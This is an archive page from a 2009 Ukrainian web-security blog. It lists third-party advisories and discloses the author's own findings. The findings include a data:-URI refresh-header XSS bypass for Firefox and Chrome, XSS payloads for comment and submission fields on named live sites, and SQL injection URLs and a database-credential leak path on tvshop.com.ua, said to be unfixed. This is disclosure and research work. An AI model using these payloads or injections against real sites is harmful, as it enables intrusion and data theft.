Архів для категорії 'Уразливості'

Добірка уразливостей

16:04 13.07.2009

В даній добірці уразливості в веб додатках:

  • Linksys/Cisco WRT350N 1.0.3.7 Insecure Samba Static Configuration (деталі)
  • Easydynamicpages 30tr Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) (деталі)
  • Maran PHP Blog Xss By Khashayar Fereidani (деталі)
  • Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani (деталі)
  • Easyecards 310a Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) By Khashayar Fereidani (деталі)
  • EasyPublish 3.0tr Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) (деталі)
  • Remote File Include Vulnerability in Flip V3.0 final (деталі)
  • SAP MaxDB dbmsrv Untrusted Execution Path Vulnerability (деталі)
  • PhpJobScheduler 3.1 Remote File Inclusion Vulnerability (деталі)
  • Cross Site Scripting (XSS) in Owl <=0.95, CVE-2008-3100 (деталі)

Cross-Site Scripting уразливості в Mozilla, Firefox та Chrome

23:55 11.07.2009

В минулому місяці я писав про Cross-Site Scripting уразливості в Mozilla, Internet Explorer, Opera та Chrome. Яка дозволяє виконання JavaScript коду через заголовок refresh (зазначу, що подібну атаку також можна реалізувати через інший вектор - через meta-refresh тег). Дана уразливість була виправлена Мозілою в Firefox 3.0.9.

Так от нещодавно, 06.07.2009, я знайшов можливість обходу даного захисту в Firefox. Також даний метод XSS атак працює в Mozilla та Chrome.

Для обходу захисту від виконання JavaScript коду через заголовок refresh потрібно використати data: URI, в якому буде вже міститися необхідний JS код. Цей метод для проведення XSS атак через meta-refresh тег вже давно відомий - він був в XSS Cheat Sheet ще в 2006 році. І от його я використав для обходу захисту в Firefox та для проведення атак через refresh-header редиректори.

XSS:

Вектори атаки через meta-refresh тег та заголовок refresh:

<meta http-equiv="refresh" content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+">

При запиті до скрипта на сайті:
http://site/script.php?param=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b
Що поверне у відповіді заголовок refresh і код виконається у браузері:
refresh: 0; URL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b

Через data: можна обійти в Firefox 3.0.9 і вище (тестував в 3.0.11) заборону на виконання JavaScript коду в заголовку refresh. Тільки в Firefox 3.0.11 і Google Chrome таким чином до кукісів не дістатися, зате це можна зробити в старій Mozilla.

Уразлива версія Mozilla 1.7.x та попередні версії.

Уразлива версія Mozilla Firefox 3.0.11 (і 3.5 також повинен бути уразливим) та попередні версії.

Уразлива версія Google Chrome 1.0.154.48 та попередні версії (і потенційно наступні версії).

Добірка уразливостей

16:16 10.07.2009

В даній добірці уразливості в веб додатках:

  • Multiple vulnerabilities in Net Inspector 6.5.0.828 (деталі)
  • Several Webroot Disclosures on Moodle (деталі)
  • Persistent Cross-site Scripting (XSS) on Moodle via blog entry title (деталі)
  • Claroline 1.8.10 Multiple XSS Vulnerabilities (деталі)
  • Buffer-overflow in BootManage TFTPD 1.99 (деталі)
  • E-Mail header Injection in HiFriend (деталі)
  • Vulnerability: SocialEngine (SocialEngine.net) high risk security flaw (деталі)
  • Local File Include Vulnerability in Interact 2.4.1 (деталі)
  • MyBlog <=0.9.8 Multiple Vulnerabilities (деталі)
  • EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability (деталі)

Уразливості на unian.net

19:23 09.07.2009

01.05.2009

У серпні, 10.08.2008, я знайшов Cross-Site Scripting уразливості на сайті http://unian.net (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

09.07.2009

XSS:

POST запит на сторінці коментарів (http://unian.net/ukr/comments/248912)
"><script>alert(document.cookie)</script>В полях: user_name, user_email, url (в полі user_email уразливість вже виправлена).

XSS через GET:

Більшість з уразливостей так досі й не виправлені.

Добірка уразливостей

16:17 08.07.2009

В даній добірці уразливості в веб додатках:

  • Fuzzylime 3.01 Remote Code Execution Exploit (деталі)
  • Java Web Start tempbuff Stack Buffer Overflow (деталі)
  • Java Web Start encoding Stack Buffer Overflow (деталі)
  • Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability (деталі)
  • openPro 1.3.1 (LIBPATH) Remote RFI Vulnerability (деталі)
  • Local File Include in Dokeos E-Learning System 1.8.5 (деталі)
  • communitycms-0.1 Remote File Includion (деталі)
  • File read in Velocity web-server (деталі)
  • Claroline 1.8.9 Multiple Security Vulnerabilities (деталі)
  • CSRF (Cross-site Request Forgery) on Moodle edit profile page (деталі)

Добірка уразливостей

16:13 04.07.2009

В даній добірці уразливості в веб додатках:

  • Xitami Web Server Multiple Vulnerabilities (Exploit) (деталі)
  • XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower (деталі)
  • PHP-NUKE SQL Module’s Name 4ndvddb (деталі)
  • BitTorrent Clients and CSRF (деталі)
  • MorASP Anket Sistemi v2.0 [PID] Bypass Vulnerability (tr) (деталі)
  • phpuserbase 1.3 (menu) Remote File Inclusion Vulnerability (деталі)
  • gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability (деталі)
  • OkulAjansi [ID] Remote SQL Injection Vulnerability (деталі)
  • Yuhhu Pubs Black Cat Remote SQL Injection Exploit (деталі)
  • Pluck Local File inclusion (деталі)

Уразливості на datingsites1000.com

23:57 03.07.2009

У жовтні, 02.10.2008, я знайшов Cross-Site Scripting, Insufficient Anti-automation, SQL Injection, Abuse of Functionality та Information Leakage уразливості на сайті http://datingsites1000.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

Уразливості на tvshop.com.ua

19:26 03.07.2009

21.04.2009

У липні, 24.07.2008, я виявив Full path disclosure, SQL Injection та Information Leakage уразливості на сайті http://tvshop.com.ua (інтернет магазин), що також доступний за адресою http://i-shop.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.cddoma.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

03.07.2009

Full path disclosure:

http://tvshop.com.ua/itemlist.php?cid=’

http://tvshop.com.ua/item.php

http://tvshop.com.ua/itemlist.php

http://tvshop.com.ua/catalog.php

SQL Injection:

http://tvshop.com.ua/itemlist.php?cid=-1%20or%20version()=4.0

http://tvshop.com.ua/catalog.php?cid=-1%20union%20select%201,version(),1,1,1/*

MySQL 4.0.27-standard-log

Зазначу, що в таблиці клієнтів магазину в БД торік, 24.07.2008, було 17197 записів. А сьогодні, майже через рік, 18112 записів. Тобто майже за рік у магазина збільшилося число клієнтів на 915. А хтось тут про кризис росказує :-) .

Information Leakage:

http://tvshop.com.ua/init.tpl

Витік login, password і name для бази даних та Source Code Disclosure.

Дані уразливості досі не виправлені.

Уразливості на www.linkexchanger.ru, www.od.com.ua, і www.lishnih.net

23:58 02.07.2009

У липні, 18.07.2008, я знайшов Cross-Site Scripting уразливості на сайтах http://www.linkexchanger.ru, http://www.od.com.ua і http://www.lishnih.net. Що використовують веб додаток LinksExchanger, про уразливості в якому я писав нещодавно.

XSS:

POST запит на сторінках linkexchanger.ru/dir/submit.php, od.com.ua/links/submit.php і lishnih.net/catalog/submit.php.
"><body onload="alert(document.cookie)В полях: Ваше имя или ник, Текстовое описание Вашей ссылки.

XSS через GET:

http://www.linkexchanger.ru

http://www.od.com.ua

http://www.lishnih.net

Експлоіти для Apache №7

22:35 02.07.2009

Продовжуючи тему експлоітів для Apache, пропоную вам нову добірку експлоітів для цього веб сервера.

Дані експлоіти для уразливостей в Apache Tomcat та Apache mod_dav / svn. Адмінам варто слідкувати за оновленням своїх серверів.

  • Apache Tomcat untime.getRuntime().exec() Privilege Escalation (win) (деталі)
  • Apache mod_dav / svn Remote Denial of Service Exploit (деталі)